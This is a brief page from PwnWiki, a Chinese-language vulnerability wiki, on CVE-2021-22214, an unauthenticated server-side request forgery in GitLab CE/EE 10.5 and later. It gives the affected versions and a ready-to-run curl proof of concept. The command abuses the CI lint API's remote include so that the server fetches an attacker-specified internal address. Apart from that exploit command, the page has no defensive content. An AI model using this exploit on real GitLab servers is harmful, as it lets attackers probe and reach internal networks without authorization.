Loading
0

CVE-2021-22214 GitLab前台SSRF漏洞

pwnwiki.com

,

漏洞影响

GitLab CE/EE >=10.5

POC

curl -s --show-error -H 'Content-Type: application/json' https://example.gitlab.com/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n  remote: http://<ip>:<port>/api/v1/targets?test.yml"}'

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库